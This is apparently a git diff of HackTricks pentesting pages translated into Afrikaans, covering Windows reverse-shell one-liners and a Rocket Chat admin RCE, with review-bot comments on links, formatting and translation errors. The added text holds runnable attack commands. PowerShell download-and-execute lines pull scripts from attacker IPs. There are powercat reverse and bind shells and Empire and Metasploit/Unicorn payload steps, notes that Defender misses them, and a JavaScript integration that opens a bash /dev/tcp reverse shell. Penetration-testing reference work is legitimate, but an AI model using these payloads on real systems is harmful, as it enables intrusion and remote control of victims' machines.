Om Invoke-_PowerShellTcp.ps1_ te aflaai en uit te voer, maak 'n kopie van die skrif en voeg by die einde van die lêer: +``` +Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 +``` +Begin om die skrip op 'n webbediener te bedien en voer dit aan die slagoffer se kant uit: +``` +powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" +``` +Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019). + +**TODO: Kontroleer ander nishang shells** + +### **PS-Powercat** + +[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) + +Laai af, begin 'n webbediener, begin die luisteraar, en voer dit op die slagoffer se kant uit: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019). + +**Ander opsies wat deur powercat aangebied word:** + +Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... +``` +Serve a cmd Shell: +powercat -l -p 443 -e cmd +Send a cmd Shell: +powercat -c 10.1.1.1 -p 443 -e cmd +Send a powershell: +powercat -c 10.1.1.1 -p 443 -ep +Send a powershell UDP: +powercat -c 10.1.1.1 -p 443 -ep -u +TCP Listener to TCP Client Relay: +powercat -l -p 8000 -r tcp:10.1.1.16:443 +Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: +powercat -c 10.1.1.15 -p 443 -e cmd -g +Start A Persistent Server That Serves a File: +powercat -l -p 443 -i C:\inputfile -rep +``` +### Empire + +[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) + +Skep 'n powershell-lanser, stoor dit in 'n lêer en laai dit af en voer dit uit. 
+``` +powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +**Gedig as kwaadwillige kode** + +### MSF-Unicorn + +[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) + +Skep 'n powershell weergawe van metasploit agterdeur met behulp van unicorn +``` +python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 +``` +Begin msfconsole met die geskepte hulpbron: +``` +msfconsole -r unicorn.rc +``` +Begin 'n webbediener wat die _powershell\_attack.txt_ lêer bedien en voer uit in die slagoffer: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" +``` +**Gedig as kwaadwillige kode** + +## Meer + +[PS>Attack](https://github.com/jaredhaight/PSAttack) PS-konsol met 'n paar offensiewe PS-modules vooraf gelaai (gecyfer)\ +[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9)[\ +WinPWN](https://github.com/SecureThisShit/WinPwn) PS-konsol met 'n paar offensiewe PS-modules en proxy-detektering (IEX) + +## Verwysings + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) +* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) +* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) +* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) +* 
[https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +​ +**Probeer Hard Sekuriteitsgroep** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 7d78e5916..da69cef74 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -1,8 +1,8 @@ # Rocket Chat {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
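Review bot: the `-`/`+` pairs in this hunk of rocket-chat.md are character-for-character identical as shown, so the change is whitespace-only (a trailing space or line-ending change around the `\` hard break); the same pattern appears in the `@@ -48,14 +47,15 @@` hunk below. If the hard break is being deliberately repaired, say so in the commit message; otherwise drop these two hunks so the diff only carries the link fix and the duplicate `{% endhint %}` removals.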
@@ -14,7 +14,6 @@ Leer & oefen GCP Hacking: {% endhint %} -{% endhint %}
@@ -29,7 +28,7 @@ As jy admin binne Rocket Chat is, kan jy RCE kry.
-* Volgens die [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So kom ons kry 'n [rev shell vir javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) soos: +* Volgens die [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So kom ons kry 'n [rev shell vir javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) soos: ```javascript const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); @@ -48,14 +47,15 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
-* Bel dit met curl en jy behoort die rev shell te ontvang +* Roep dit aan met curl en jy behoort die rev shell te ontvang
{% embed url="https://websec.nl/" %} + {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
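Review bot: the link target in the `@@ -29,7 +28,7 @@` hunk changes from `../../generic-methodologies-and-resources/shells/linux.md#nodejs` to `../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs`, but this commit only creates files under `reverse-shells/` (the file headers above show `new file mode` for them) and nothing here removes or redirects the old `shells/` pages. Grep the rest of the book for `shells/linux.md`, `shells/windows.md`, `shells/msfvenom.md` and `shells/full-ttys.md` and update or redirect them in the same change so no other page is left pointing at the old path. The wording change `Bel dit met curl` to `Roep dit aan met curl` is fine.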
@@ -67,5 +67,3 @@ Leer & oefen GCP Hacking: {% endhint %} -
-{% endhint %}
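Review bot: the Lua one-liner in reverse-shells/linux.md breaks shell quoting: the whole script is passed as `lua5.1 -e '...'` in single quotes, but it contains `io.popen(cmd, 'r')`, so the shell terminates the argument at `'r'` and the command does not run as pasted. Use double quotes for the mode (`io.popen(cmd, "r")`) or drop it, since `io.popen(cmd)` already defaults to read mode. Two translation nits in the same file: the heading `## Vinger` should stay `## Finger` because it names the `finger` command used in the payload, and `Die Slachtoffer` mixes Dutch spelling with the Afrikaans `Slagoffer` used elsewhere in this patch.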
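Review bot: the GitBook code wrappers in reverse-shells/msfvenom.md are unbalanced. The `{% code overflow="wrap" %}` opened before the Windows Bind Shell, CMD Shell, Linux Bind Shell and Perl blocks has no matching `{% endcode %}`; the next `{% endcode %}` only appears after the Skep Gebruiker, Encoder, SunOS and Bash blocks respectively, and the Encoder block is closed by the `{% endcode %}` whose opener belongs to `Voer Opdrag Uit`. Add the missing `{% endcode %}` directly after each fenced block so every opener is closed before the next heading. Two translation nits in the same file: the heading `### OORLOG` is a literal translation of WAR, which here is the Java web archive format produced by `-f war` and should remain `### WAR`; and `#### Terugskakel**l**` carries stray bold markers around a trailing `l`.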
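Review bot: several content errors in reverse-shells/windows.md that the translation carried over or introduced. The heading `## OpenSSH` sits above `openssl req`, `openssl s_server` and `openssl s_client` commands and should read `## OpenSSL`, as it does in linux.md. In the Regsvr32 - Metasploit block, `set payload windows/meterpreter/reverse/tcp` is not a valid payload path; it should be `windows/meterpreter/reverse_tcp`, as used elsewhere in this patch. The Lua one-liner has the same quoting bug as linux.md (`io.popen(cmd, 'r')` inside `lua5.1 -e '...'` ends the single-quoted argument). The Perl section is under a Windows page but execs `/bin/sh -i`, which does not exist on Windows; use `cmd.exe` there. In the MSIExec section the attacker starts an HTTP server (`python -m SimpleHTTPServer 80`, which is Python 2 only; `python3 -m http.server 80` on current Kali) but the victim line fetches the package over SMB as `\\10.2.0.5\kali\shell.msi`; either serve it with `impacket-smbserver` as the PS-Bat section does, or install it from the HTTP URL with `msiexec /quiet /i http://10.2.0.5/shell.msi`. Status labels are inconsistent and in one case mistranslated: `Gedig deur verdediger` (literally "poem by defender") under Regsvr32 and `Gedig as kwaadwillige kode` under Empire and MSF-Unicorn should use the same wording as the other markers, e.g. `Gedetekteer deur Verdediger`. Finally, `## Powershell Skale` and `In die **Skale** gids` render "Shells" as `Skale` (scales); keep `Shells`, since it is the name of the nishang directory the text refers to.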